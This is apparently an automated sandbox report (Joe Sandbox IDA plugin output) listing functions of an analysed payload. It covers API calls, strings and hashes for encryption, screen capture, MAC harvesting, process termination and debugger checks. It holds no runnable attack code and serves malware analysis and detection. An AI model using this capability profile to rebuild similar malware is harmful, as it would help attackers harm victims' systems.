                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CryptException@8Throw$Hash$Param$AcquireContextCreateDataExceptionRaise_memset_sprintf
                                                                                                                            • String ID: %.2X
                                                                                                                            • API String ID: 1084002244-213608013
                                                                                                                            • Opcode ID: 03cb073c6b533b311cb5cd655c8ec489fbcfa7bb375a4247ab325694a7f001cf
                                                                                                                            • Instruction ID: 5e26b0c935ff1b54ae210d3a0da95a3588f9070baa3643effd86ce1a62566d7c
                                                                                                                            • Opcode Fuzzy Hash: 03cb073c6b533b311cb5cd655c8ec489fbcfa7bb375a4247ab325694a7f001cf
                                                                                                                            • Instruction Fuzzy Hash: 595172B1D40209ABDF11DFA1CC46FEFBBB8EF15704F10452AF501B6181E7796A058BA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0046EAA0 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 159encryptionCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,0055FCA4,00000000), ref: 0046EB01
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0046EB17
                                                                                                                              • Part of subcall function 00490ECA: RaiseException.KERNEL32(?,?,?,<yV,?,?,?,?,?,00483B9C,?,0056793C,?,00000001), ref: 00490F1F
                                                                                                                            • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0046EB2C
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0046EB42
                                                                                                                            • CryptHashData.ADVAPI32(00000000,?,?,00000000), ref: 0046EB4E
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0046EB64
                                                                                                                            • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,?,00000000), ref: 0046EB83
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0046EB95
                                                                                                                            • _memset.LIBCMT ref: 0046EBB4
                                                                                                                            • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0046EBC8
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0046EBDA
                                                                                                                            • _sprintf.LIBCMT ref: 0046EBF4
                                                                                                                            • CryptDestroyHash.ADVAPI32(00000000), ref: 0046EC44
                                                                                                                            • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0046EC4F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Crypt$Exception@8HashThrow$ContextParam$AcquireCreateDataDestroyExceptionRaiseRelease_memset_sprintf
                                                                                                                            • String ID: %.2X
                                                                                                                            • API String ID: 1637485200-213608013
                                                                                                                            • Opcode ID: d9f4b3e144a88820df1e53c940d5770bd3d527cae669204d3a3e48a72aba463a
                                                                                                                            • Instruction ID: ea4b1a449e4bdfdf83846fbe935d5cf7bab8ad935e32adb0a5d9a84497b4640b
                                                                                                                            • Opcode Fuzzy Hash: d9f4b3e144a88820df1e53c940d5770bd3d527cae669204d3a3e48a72aba463a
                                                                                                                            • Instruction Fuzzy Hash: 59516171D40209AADF20DBA1CC46FEFBBB8EF15704F14052AF902B7281E77969058BA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004E22E0 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 127windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004B49A0: GetModuleHandleA.KERNEL32(?,?,00000001,?,004B4B72), ref: 004B49C7
                                                                                                                              • Part of subcall function 004B49A0: GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004B49D7
                                                                                                                              • Part of subcall function 004B49A0: GetDesktopWindow.USER32 ref: 004B49FB
                                                                                                                              • Part of subcall function 004B49A0: GetProcessWindowStation.USER32(?,004B4B72), ref: 004B4A01
                                                                                                                              • Part of subcall function 004B49A0: GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,004B4B72), ref: 004B4A1C
                                                                                                                              • Part of subcall function 004B49A0: GetLastError.KERNEL32(?,004B4B72), ref: 004B4A2A
                                                                                                                              • Part of subcall function 004B49A0: GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,004B4B72), ref: 004B4A65
                                                                                                                              • Part of subcall function 004B49A0: _wcsstr.LIBCMT ref: 004B4A8A
                                                                                                                            • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004E2316
                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 004E2323
                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 004E2338
                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000A), ref: 004E2341
                                                                                                                            • CreateCompatibleBitmap.GDI32(00000000,?,00000010), ref: 004E234E
                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 004E235C
                                                                                                                            • GetObjectA.GDI32(00000000,00000018,?), ref: 004E236E
                                                                                                                            • BitBlt.GDI32(?,00000000,00000000,?,00000010,?,00000000,00000000,00CC0020), ref: 004E23CA
                                                                                                                            • GetBitmapBits.GDI32(?,?,00000000), ref: 004E23D6
                                                                                                                            • SelectObject.GDI32(?,?), ref: 004E2436
                                                                                                                            • DeleteObject.GDI32(00000000), ref: 004E243D
                                                                                                                            • DeleteDC.GDI32(?), ref: 004E244A
                                                                                                                            • DeleteDC.GDI32(?), ref: 004E2450
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Object$CreateDelete$BitmapCapsCompatibleDeviceInformationSelectUserWindow$AddressBitsDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                                            • String ID: .\crypto\rand\rand_win.c$DISPLAY
                                                                                                                            • API String ID: 151064509-1805842116
                                                                                                                            • Opcode ID: 4ed62d925f17da6597ffca3e72bbf94ebeea984de2b08251d9b14925d3edd78f
                                                                                                                            • Instruction ID: a7f733731121fea7d785b09f5da35ba2d971b456535f3806dcbf7ece69462c6d
                                                                                                                            • Opcode Fuzzy Hash: 4ed62d925f17da6597ffca3e72bbf94ebeea984de2b08251d9b14925d3edd78f
                                                                                                                            • Instruction Fuzzy Hash: 1741E731904300ABD3209B759C4AF2FBFF8FF86714F00051EFA54962A2E7B598059BA6
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0046E670 Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 78COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _malloc.LIBCMT ref: 0046E67F
                                                                                                                              • Part of subcall function 00480C62: __FF_MSGBANNER.LIBCMT ref: 00480C79
                                                                                                                              • Part of subcall function 00480C62: __NMSG_WRITE.LIBCMT ref: 00480C80
                                                                                                                              • Part of subcall function 00480C62: RtlAllocateHeap.NTDLL(00A90000,00000000,00000001,?,?,?,?,00483B69,?), ref: 00480CA5
                                                                                                                            • _malloc.LIBCMT ref: 0046E68B
                                                                                                                            • _wprintf.LIBCMT ref: 0046E69E
                                                                                                                            • _free.LIBCMT ref: 0046E6A4
                                                                                                                              • Part of subcall function 00480BED: HeapFree.KERNEL32(00000000,00000000,?,0048507F,00000000,0048520D,00480CE9), ref: 00480C01
                                                                                                                              • Part of subcall function 00480BED: GetLastError.KERNEL32(00000000,?,0048507F,00000000,0048520D,00480CE9), ref: 00480C13
                                                                                                                            • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0046E6B9
                                                                                                                            • _free.LIBCMT ref: 0046E6C5
                                                                                                                            • _malloc.LIBCMT ref: 0046E6CD
                                                                                                                            • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0046E6E0
                                                                                                                            • _sprintf.LIBCMT ref: 0046E720
                                                                                                                            • _wprintf.LIBCMT ref: 0046E732
                                                                                                                            • _wprintf.LIBCMT ref: 0046E73C
                                                                                                                            • _free.LIBCMT ref: 0046E745
                                                                                                                            Strings
                                                                                                                            • %02X:%02X:%02X:%02X:%02X:%02X, xrefs: 0046E71A
                                                                                                                            • Address: %s, mac: %s, xrefs: 0046E72D
                                                                                                                            • Error allocating memory needed to call GetAdaptersinfo, xrefs: 0046E699
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _free_malloc_wprintf$AdaptersHeapInfo$AllocateErrorFreeLast_sprintf
                                                                                                                            • String ID: %02X:%02X:%02X:%02X:%02X:%02X$Address: %s, mac: %s$Error allocating memory needed to call GetAdaptersinfo
                                                                                                                            • API String ID: 3901070236-1604013687
                                                                                                                            • Opcode ID: c120408994a542fc3aae3990ed710602f6289028875ef872b248a93bd240d085
                                                                                                                            • Instruction ID: 62ca1a70ffacf71c8f83b6ce1a21f458bd1db17afd21658e11326da53ba1915f
                                                                                                                            • Opcode Fuzzy Hash: c120408994a542fc3aae3990ed710602f6289028875ef872b248a93bd240d085
                                                                                                                            • Instruction Fuzzy Hash: BB113AB29005547BC2B173B64C06EFF3ADC8F46706F04056FFE98D5142E65C5A09A3BA
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00470160 Relevance: 26.2, APIs: 17, Instructions: 660COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00471AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00471ACA
                                                                                                                              • Part of subcall function 00471AB0: DispatchMessageW.USER32(?), ref: 00471AE0
                                                                                                                              • Part of subcall function 00471AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00471AEE
                                                                                                                            • PathFindFileNameW.SHLWAPI(?,?,00000000), ref: 00470346
                                                                                                                            • _memmove.LIBCMT ref: 00470427
                                                                                                                            • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0047048E
                                                                                                                            • _memmove.LIBCMT ref: 00470514
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 273148273-0
                                                                                                                            • Opcode ID: e7ee1e09baa8b8373053189995de10bee4732a8e4dc0c615536b5d35e8c445b7
                                                                                                                            • Instruction ID: 4e43f8d237fa0cc47e4ea7f650db2158d18c991617b1f2851f8a7a8763acd288
                                                                                                                            • Opcode Fuzzy Hash: e7ee1e09baa8b8373053189995de10bee4732a8e4dc0c615536b5d35e8c445b7
                                                                                                                            • Instruction Fuzzy Hash: 9C42B070D01208DBDF24EFA4C945BDEB7F4BF04308F20856EE409A7251E779AA45CBA9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0046FB98 Relevance: 15.3, APIs: 10, Instructions: 266stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Path$AppendExistsFile_free_malloc_memmovelstrcatlstrcpy
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3232302685-0
                                                                                                                            • Opcode ID: 7b51ece78b47c552b8adbb8f499e1a4633ab5d51fc836de29c87a2686d728397
                                                                                                                            • Instruction ID: 59b0d89b13b52cafe7865db0817cae3585a529c84d81ba7369e7c46ed2be6a09
                                                                                                                            • Opcode Fuzzy Hash: 7b51ece78b47c552b8adbb8f499e1a4633ab5d51fc836de29c87a2686d728397
                                                                                                                            • Instruction Fuzzy Hash: 7BB19F70D00208DBDF20EFA4DD45BDEB7B5BF15308F10446AE40AAB251E779AA49CF5A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00472440 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 52processCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 0047244F
                                                                                                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00472469
                                                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004724A1
                                                                                                                            • TerminateProcess.KERNEL32(00000000,00000009), ref: 004724B0
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004724B7
                                                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 004724C1
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004724CD
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                                                                                                            • String ID: cmd.exe
                                                                                                                            • API String ID: 2696918072-723907552
                                                                                                                            • Opcode ID: 686b82e6c5e192d42608940affa233aec9b32dab4e275a7a2dcee072d640df2f
                                                                                                                            • Instruction ID: 9037aecd045fcd4b11b12cceb55fd8029414c17358ba4715e6247d686d5caf2f
                                                                                                                            • Opcode Fuzzy Hash: 686b82e6c5e192d42608940affa233aec9b32dab4e275a7a2dcee072d640df2f
                                                                                                                            • Instruction Fuzzy Hash: 7901B5355012157BE7306BA4AC8DFAF7B6CEF09715F004051FD08D2242E7B489499BB5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004982A2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _wcscmp.LIBCMT ref: 004982B9
                                                                                                                            • _wcscmp.LIBCMT ref: 004982CA
                                                                                                                            • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00498568,?,00000000), ref: 004982E6
                                                                                                                            • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00498568,?,00000000), ref: 00498310
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: InfoLocale_wcscmp
                                                                                                                            • String ID: ACP$OCP
                                                                                                                            • API String ID: 1351282208-711371036
                                                                                                                            • Opcode ID: 1565af8796d8fca58075b66a2e283cf308e596930ccb6ba70c0922ab1c2193a5
                                                                                                                            • Instruction ID: f09221e07787fd6ed1a268f831bd9814c4459e4777eefef0877f2679f2b83973
                                                                                                                            • Opcode Fuzzy Hash: 1565af8796d8fca58075b66a2e283cf308e596930ccb6ba70c0922ab1c2193a5
                                                                                                                            • Instruction Fuzzy Hash: 2C01AD32240515AADF209F5CDC45F9A3F98AF06BA4F10807AF904DA152EF34DA41C7CC
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00461000 Relevance: 7.6, Strings: 6, Instructions: 119COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Auth$Genu$cAMD$enti$ineI$ntel
                                                                                                                            • API String ID: 0-1714976780
                                                                                                                            • Opcode ID: 5f5d6626ad0f6917a330496c5e5681d55bc31fb8fcfe0306b7157049ee0a44b3
                                                                                                                            • Instruction ID: b6ea48031fac804e50237fea73b899a599e52b664b79a4200841d0cd80592764
                                                                                                                            • Opcode Fuzzy Hash: 5f5d6626ad0f6917a330496c5e5681d55bc31fb8fcfe0306b7157049ee0a44b3
                                                                                                                            • Instruction Fuzzy Hash: C5314977A114960AFB78547888453BD20839397370F2EC73BD226C3AE4F87D8D81019A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0046C070 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 280COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            • input != nullptr && output != nullptr, xrefs: 0046C095
                                                                                                                            • e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl, xrefs: 0046C090
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __wassert
                                                                                                                            • String ID: e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl$input != nullptr && output != nullptr
                                                                                                                            • API String ID: 3993402318-1975116136
                                                                                                                            • Opcode ID: 679917d25044a767dc263e370465a4748786f75e15b486e877805c7e02c15bab
                                                                                                                            • Instruction ID: a55f87971629810a1491c9fb319ad9f1b3725c102d4007a170b48d151e7ca282
                                                                                                                            • Opcode Fuzzy Hash: 679917d25044a767dc263e370465a4748786f75e15b486e877805c7e02c15bab
                                                                                                                            • Instruction Fuzzy Hash: 4DC19DB5E002499FCB54CFA9C881AEEBBF0FF48300F24856AD859E7301E334AA458B55
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00484168 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0048419D
                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,00000001), ref: 00484252
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
